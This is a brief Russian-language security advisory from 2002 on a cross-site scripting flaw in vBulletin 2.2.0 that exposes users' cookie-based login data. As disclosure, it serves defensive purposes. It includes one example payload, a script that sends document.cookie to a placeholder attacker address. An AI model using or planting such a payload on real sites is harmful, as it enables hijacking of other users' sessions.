Межсайтовый скриптинг в vBulletin

Дата публикации:
04.02.2002
Всего просмотров:
1946
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: vBulletin – Web основанная система BBS Jelsoft Enterprises.

Найденная уязвимость позволяет выполнить злонамеренный сценарий в контексте сайта, выполняющего vBulletin. Уязвимость позволяет злонамеренному пользователю перехватывать опознавательные данные другого пользователя, основанные на cookie.
Пример:
<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">';</script>

Уязвимость найдена в Jelsoft vBulletin 2.2.0
 

Ссылки: Источник
или введите имя

CAPTCHA